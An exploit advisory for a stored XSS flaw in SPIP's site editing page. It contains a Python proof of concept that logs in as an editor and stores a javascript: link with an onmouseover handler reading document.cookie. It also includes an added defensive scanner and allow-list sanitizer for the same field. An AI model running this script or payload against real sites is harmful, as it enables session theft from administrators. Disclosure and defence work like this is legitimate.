=============================================================================================================================================
| # Title : SPIP before 4.4.9 Stored XSS Injection After Authentication |
| # Author : indoushka |
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 147.0.4 (64-bit) |
| # Vendor : https://www.spip.net/en_rubrique25.html |
=============================================================================================================================================
[+] Summary : This Python script uses the requests library to open an HTTP session and authenticate against a website running SPIP with editor-level credentials.
After a successful login, the script sends a POST request to the site editing endpoint (?exec=site_edit) that places a JavaScript payload in the descriptif field.
The payload is an <a> tag containing:
- A javascript: URI in the href attribute
- An onmouseover event handler
- A call that reads document.cookie
The objective is to test for a Stored Cross-Site Scripting (Stored XSS) vulnerability, which exists if the platform fails to sanitize this input properly (for example via echappe_anti_xss()).
Workflow:
1. Create an HTTP session.
2. Send the login credentials.
3. If authentication succeeds, submit the malicious input to a content field.
4. Check whether the submitted text is echoed back in the server response; the script treats that as the payload having been accepted.
This script is a security testing scenario intended to verify the presence of a Stored XSS vulnerability in the SPIP administration interface.
[+] POC :
import requests

# Placeholder host used by the advisory; replace with the instance under test.
target_url = "http://example-spip-site.com/ecrire/?exec=site_edit"
login_url = "http://example-spip-site.com/spip.php?page=login"
username = "redacteur_user"
password = "password123"

# Stored XSS payload: javascript: URI in href plus an onmouseover handler that reads document.cookie.
payload = '<a href="javascript:alert(\'XSS_Exploited\')" onmouseover="console.log(document.cookie)">Technical Info</a>'

session = requests.Session()

login_data = {
    'var_lang': 'en',
    'formulaire_action': 'login',
    'login': username,
    'password': password
}

print("[+] Attempting to log in...")
response = session.post(login_url, data=login_data)

if response.status_code == 200:
    # The script treats an HTTP 200 from the login form as a successful login.
    print("[+] Login successful. Starting the injection process...")
    injection_data = {
        'nom_site': 'Malicious Site',
        'url_site': 'http://attacker.com',
        'descriptif': payload,
        'statut': 'publie'
    }
    submit_response = session.post(target_url, data=injection_data)
    # Acceptance is judged by whether the link text is echoed back in the response.
    if "Technical Info" in submit_response.text:
        print("[!] Injection successful! The code will execute when an admin views the site.")
    else:
        print("[-] Injection failed or was blocked by a security filter.")
else:
    print("[-] Failed to log in.")
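As an added example (not part of the advisory and not SPIP's own echappe_anti_xss()), the following Python shows the server-side checks a defender would want on a free-text field such as descriptif: a scanner that flags the three payload characteristics listed in the summary (a javascript: URI in a URL attribute, an on* event handler, active content elements) and that tolerates the whitespace and entity obfuscation a naive substring match misses, and an allow-list sanitizer that keeps plain formatting and safe links while dropping everything else. The tag allow-list and the safe-scheme set are assumptions chosen for a short descriptive field, not SPIP's policy; the sample input is constructed from the payload shape described above.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample input: the kind of descriptif value the advisory describes.
SAMPLE_DESCRIPTIF = (
    '<a href="javascript:alert(\'XSS_Exploited\')" '
    'onmouseover="console.log(document.cookie)">Technical Info</a>'
)

# Schemes that can execute script when used in a link-like attribute.
_SCRIPT_SCHEME_RE = re.compile(r"^(javascript|vbscript|data):", re.I)
# Attributes whose value is interpreted as a URL.
_URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href"}
# Assumed allow-list for a short descriptive field (not SPIP's own policy).
_ALLOWED_TAGS = {"a", "b", "i", "em", "strong", "p", "br"}
_SAFE_SCHEMES = {"http", "https", "mailto"}
# Elements whose text content is script, not prose, and is dropped entirely.
_DROP_CONTENT = {"script", "style"}
_SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]*):")


def _normalise_url(value):
    # Browsers ignore control characters and whitespace inside the scheme
    # (" java\tscript:" still runs), so strip them before inspecting it.
    return re.sub(r"[\x00-\x20]", "", value or "").lower()


def _is_script_uri(value):
    return bool(_SCRIPT_SCHEME_RE.match(_normalise_url(value)))


def _is_safe_href(value):
    m = _SCHEME_RE.match(_normalise_url(value))
    # No scheme means a relative URL, which is fine; otherwise the scheme must be allow-listed.
    return m is None or m.group(1) in _SAFE_SCHEMES


class _IndicatorScanner(HTMLParser):
    """Collects (tag, attribute, reason) triples for script-capable markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in _DROP_CONTENT:
            self.findings.append((tag, None, "active content element"))
        for name, value in attrs:
            # HTMLParser lowercases names and decodes entities such as &#58; in values.
            if name.startswith("on"):
                self.findings.append((tag, name, "event handler attribute"))
            elif name in _URL_ATTRS and _is_script_uri(value):
                self.findings.append((tag, name, "script-capable URI scheme"))


class _Sanitizer(HTMLParser):
    """Rebuilds a fragment keeping only allow-listed tags and safe <a href> values."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skipping = False

    def handle_starttag(self, tag, attrs):
        if tag in _DROP_CONTENT:
            self._skipping = True
            return
        if tag not in _ALLOWED_TAGS:
            return  # tag dropped; its text content is still kept by handle_data
        kept = ""
        for name, value in attrs:
            # Only href on <a> survives, and only with a relative path or allow-listed scheme.
            if tag == "a" and name == "href" and value and _is_safe_href(value):
                kept = ' href="%s"' % html.escape(value, quote=True)
        self.out.append("<%s%s>" % (tag, kept))

    def handle_endtag(self, tag):
        if tag in _DROP_CONTENT:
            self._skipping = False
        elif tag in _ALLOWED_TAGS and tag != "br":
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._skipping:
            self.out.append(html.escape(data))


def find_xss_indicators(fragment):
    """Return the suspicious (tag, attribute, reason) triples found in an HTML fragment."""
    scanner = _IndicatorScanner()
    scanner.feed(fragment)
    scanner.close()
    return scanner.findings


def sanitize_fragment(fragment):
    """Return the fragment with event handlers, script URIs and unknown tags removed."""
    sanitizer = _Sanitizer()
    sanitizer.feed(fragment)
    sanitizer.close()
    return "".join(sanitizer.out)


if __name__ == "__main__":
    print(find_xss_indicators(SAMPLE_DESCRIPTIF))
    print(sanitize_fragment(SAMPLE_DESCRIPTIF))
```

The scanner is the piece to wire into request validation or review of submitted content (it reports what was matched and why, which makes a useful log line), while the sanitizer is the storage-side fix: the sample above comes out as a bare `<a>Technical Info</a>`, with both the javascript: href and the onmouseover handler gone.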
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================